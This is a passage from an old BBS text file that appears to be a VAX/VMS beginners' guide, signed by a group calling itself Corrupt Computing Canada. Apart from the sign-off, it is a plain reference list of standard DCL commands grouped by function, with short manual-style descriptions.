Cottapin, Piper, Par, Snooty and the rest of the ALTOS gang for all the

interesting talks...



See ya around!



E N T I T Y



Corrupt Computing Canada!



DCL REFERENCE SECTION

---------------------



  Rather than provide a DCL dictionary, I thought it would be more appropriate

for a beginners file to include a section that separates some of the more

useful commands according to function:



-------------------------------------------------------------------------------

1. Submitting batch and print jobs and controlling batch and print queues.



ASSIGN/MERGE      Moves jobs from one queue to another.

ASSIGN/QUEUE      Assigns a queue to a device.

DEASSIGN/QUEUE    Deassigns a queue from a device.

DELETE/ENTRY      Deletes a job or jobs from a queue.

DELETE/QUEUE      Deletes a queue and all its jobs.

INITIALIZE/QUEUE  Creates and initializes a queue.

PRINT             Places a job in a print queue.

SET QUEUE         Changes the current status or attributes of a queue.

SET QUEUE/ENTRY   Changes the attributes of a job.

SHOW PRINTER      Displays default characteristics defined for a printer.

SHOW QUEUE        Displays the attributes of the jobs in a queue.

START/QUEUE       Starts or restarts a queue.

STOP/QUEUE        Stops a queue.

SUBMIT            Places a job in a batch queue.

SYNCHRONIZE       Suspends processing until a specified job completes.



-------------------------------------------------------------------------------

2. Performing operations specific to command procedures.



DECK              Marks the beginning of a special input stream.

DELETE/SYMBOL     Deletes one or more names from a symbol table.

EOD               Marks the end of a special input stream.

EXIT              Terminates a command procedure.

GOTO              Transfers control to a label in a command procedure.

IF                Executes a command only if an expression is true.

INQUIRE           Requests input and assigns the result to a symbol.

ON                Specifies an action to perform when a condition occurs.

SET CONTROL       Controls the use of the CTRL/T and CTRL/Y keys.

SET ON            Sets error checking on or off.

SET RESTART_VALUE Sets the value of a batch job restart symbol.

SET VERIFY        Displays command input as it is read.

SHOW SYMBOL       Displays the value of a symbol.

WAIT              Suspends processing for a specified period of time.

OPEN              Makes a file available for reading or writing.

CLOSE             Terminates processing of a file.

READ              Reads and optionally deletes a record from an open file.

WRITE             Writes a record to an open file.



-------------------------------------------------------------------------------

3. Communicating with other people using the system.



MAIL              Sends/reads messages to/from other users.

PHONE             Permits users to communicate by typing messages to

                  one another's terminal screens.

REPLY             Displays a message on one or more terminal screens.

REQUEST           Displays a message on the operator's console.

SHOW USERS        Lists the interactive users on the system.



-------------------------------------------------------------------------------

4. Create and switch control between user processes.



LOGOUT            Terminates an interactive terminal session.

SET PASSWORD      Changes your password.

ANALYZE/PROCESS   Analyzes a process dump.

ATTACH            Switches your terminal between SPAWNed processes.

CONNECT           Connects a physical terminal to a virtual terminal.

DISCONNECT        Disconnects a physical terminal from a virtual terminal.

PRINT             Creates a print job.

RUN/PROCESS       Creates a detached process or subprocess.

SET HOST          Connects your terminal to another system via DECnet.

SHOW NETWORK      Displays the nodes you can reach from your system.

SPAWN             Creates a subprocess with a similar environment.

SUBMIT            Creates a batch job.



-------------------------------------------------------------------------------

5. Creating and debugging images.



ANALYZE/IMAGE     Analyzes an image file.

ANALYZE/OBJECT    Analyzes an object module.

DEBUG             Invokes the symbolic debugger after a CTRL/Y.

DEPOSIT           Changes the contents of memory.

DIFFERENCES       Displays differences in content between two files.

DUMP              Displays the uninterpreted contents of a file.

EDIT              Creates (optionally) and edits a file.

EXAMINE           Displays the contents of memory.

LIBRARY           Creates or modifies various kinds of libraries.

LINK              Creates images from object modules.

MACRO             Creates object modules from macro source programs.

MESSAGE           Creates object modules from message source programs.

PATCH             Patches an image.

RUN               Runs an executable image.

SET COMMAND       Updates the commands available to the process.



-------------------------------------------------------------------------------

6. Running executable images.



CANCEL            Cancels a scheduled wakeup request.

CONTINUE          Resumes execution of an interrupted command.

DEBUG             Invokes the VAX/VMS debugger after a CTRL/Y.

DEPOSIT           Changes the contents of memory.

EXAMINE           Displays the contents of memory.

EXIT              Terminates execution of an image or command procedure.

RUN               Runs an image.

SET COMMAND       Updates the commands available to the process.

STOP              Abruptly terminates execution of an image, process, or

                  command procedure.



-------------------------------------------------------------------------------

7. Saving and cataloging information on storage devices.



APPEND            Appends one file to another.

COPY              Creates a copy of an existing file or files.

CREATE            Creates a new file.

DELETE            Deletes a file or files.

DIFFERENCES       Displays differences in content between two files.

DIRECTORY         Displays the names of the files in a directory.

EDIT              Creates (optionally) and edits a file.

MERGE             Merges sorted files.

PRINT             Prints the contents of a file.

PURGE             Deletes old versions of a file or files.

RENAME            Recatalogs an existing file.

SEARCH            Locates a character string within a file or files.

SORT              Sorts the data in a file.

TYPE              Displays the contents of a file.

SET DEFAULT       Changes the default device and directory.

SHOW DEFAULT      Displays the default device and directory.

ANALYZE/RMS_FILE  Analyzes the internal structure of a file.

CONVERT           Changes the attributes of a file.

CONVERT/RECLAIM   Reclaims unused space in an indexed file.

CREATE/DIRECTORY  Creates a new directory or subdirectory.

CREATE/FDL        Creates a new file with tailored attributes.

DUMP              Displays the uninterpreted contents of a file.

EDIT/FDL          Creates a file definition file.

EDIT/SUM          Updates a file with multiple files of edit commands.

EXCHANGE          Reformats files formatted by other operating systems.

LIBRARY           Creates or modifies various kinds of libraries.

RUNOFF            Formats one or more documents (text files).

SET DIRECTORY     Changes the characteristics of a directory.

SET FILE          Changes the characteristics of a file.

SET PROTECTION    Changes the protection of a file.

SET PROTECT/DEF   Changes the default protection given to files.

SET RMS_DEFAULT   Changes the default block and buffer count values.

SHOW PROTECTION   Displays the default protection.

SHOW QUOTA        Displays your quota of space on a disk volume.

SHOW RMS_DEFAULT  Displays the default block and buffer count values.

UNLOCK            Closes a file accidentally left open.



-------------------------------------------------------------------------------

8. Using higher-level names in place of device and file names.



ASSIGN            Equates a logical name to an equivalence string.

CREATE/NAME_TABLE Creates a logical name table.

DEASSIGN          Deletes a logical name.

DEFINE            Equates a logical name to an equivalence string.

SHOW LOGICAL      Displays logical names and their equivalencies.

SHOW TRANSLATION  Displays a logical name and its first equivalence.



-------------------------------------------------------------------------------

9. Using physical devices.



ALLOCATE          Allocates a device for your exclusive use.

DEALLOCATE        Releases an allocated device for general use.

DISMOUNT          Makes a storage device unavailable for processing.

INITIALIZE        Formats a storage device.

MOUNT             Makes a storage device available for processing.

ANALYZE/DISK      Checks the readability and validity of disks.

ANALYZE/ERROR_LOG Displays the contents of the system error log.

ANALYZE/MEDIA     Analyzes the format of a storage device.

BACKUP            Saves or restores files from storage devices.

SET CARD_READER   Sets the translation mode for a card reader.

SET DEVICE        Sets device characteristics.

SET MAGTAPE       Sets magnetic tape device characteristics.

SET PRINTER       Sets line printer characteristics.

SET PROTECT/DEV   Sets protection on a non-files device.

SET VOLUME        Sets mounted volume characteristics.

SHOW DEVICES      Displays the status of devices.

SHOW ERROR        Displays device error counts.

SHOW MAGTAPE      Displays magnetic tape characteristics.

SHOW PRINTER      Displays line printer characteristics.



-------------------------------------------------------------------------------

10. Monitoring, maintaining, tuning, and trouble-shooting the system.



ACCOUNTING        Collects, records, and reports accounting information.

ANALYZE/CRASH     Analyzes a system dump.

ANALYZE/DISK      Checks the readability and validity of disks.

ANALYZE/ERROR_LOG Displays the contents of the system error log.

ANALYZE/MEDIA     Analyzes the format of a storage device.

ANALYZE/RMS_FILE  Analyzes the internal structure of a file.

ANALYZE/SYSTEM    Analyzes the running system.

BACKUP            Saves or restores files from storage devices.

MONITOR           Displays performance information on the running system.

REPLY             Displays a message on one or more terminal screens.

REQUEST           Displays a message on the operator's console.

SET ACCOUNTING    Initializes the accounting log file.

SET AUDIT         Enables auditing of security events.

SET COMMAND       Updates the commands available to the system.

SET DAY           Changes the day type.

SET LOGINS        Sets a limit on the number of interactive users.

SET TIME          Resets the system clock.

SHOW ERROR        Displays processor, memory, and device error counts.

SHOW MEMORY       Displays usage information on memory.

SHOW SYSTEM       Lists the processes on the running system.

SHOW USER         Lists the interactive users on the running system.



-------------------------------------------------------------------------------

11. Manipulating your terminal-specific interactive environment



CONNECT           Connects a physical terminal to a virtual terminal.

DEFINE/KEY        Equates terminal function keys to command lines.

DELETE/KEY        Deletes a terminal function key definition.

DISCONNECT        Disconnects a physical terminal from a virtual terminal.

RECALL            Recalls previously entered interactive commands.

SET CONTROL       Controls the use of the CTRL/T and CTRL/Y keys.

SET HOST          Connects your terminal to another system via DECnet.

SET PROMPT        Sets the interactive command prompt.

SET TERMINAL      Sets terminal characteristics.

SHOW KEY          Displays one or more function key definitions.

SHOW TERMINAL     Displays terminal characteristics.



-------------------------------------------------------------------------------

12. Examining and controlling the user environment.



SET COMMAND       Updates the commands available to the process.

SET CONTROL       Controls the use of the CTRL/T and CTRL/Y keys.

SET DEFAULT       Changes the default device and directory.

SET HOST          Connects your terminal to another system via DECnet.

SET MESSAGE       Overrides or supplements system messages.

SET PASSWORD      Changes your password.

SET PROCESS       Changes your process characteristics.

SET PROMPT        Sets the interactive command prompt.

SET PROTECT/DEF   Changes the default protection given to files.

SET RMS_DEFAULT   Changes the default block and buffer count values.

SET UIC           Changes the UIC of your process.

SET WORKING_SET   Changes your working set limit or quota.

SHOW DEFAULT      Displays the default device and directory.

SHOW KEY          Displays one or more function key definitions.

SHOW LOGICAL      Displays logical names and their equivalencies.

SHOW PROCESS      Displays your process characteristics.

SHOW PROTECTION   Displays the default protection.

SHOW QUOTA        Displays your quota of space on a disk volume.

SHOW RMS_DEFAULT  Displays the default block and buffer count values.

SHOW STATUS       Displays brief process characteristics.

SHOW SYMBOL       Displays the value of a symbol.

SHOW TERMINAL     Displays terminal characteristics.

SHOW TIME         Displays the current date and time.

SHOW TRANSLATION  Displays a logical name and its first equivalence.

SHOW WORKING_SET  Displays your working set limit and quota.



-------------------------------------------------------------------------------



Downloaded From P-80 Systems 304-744-2253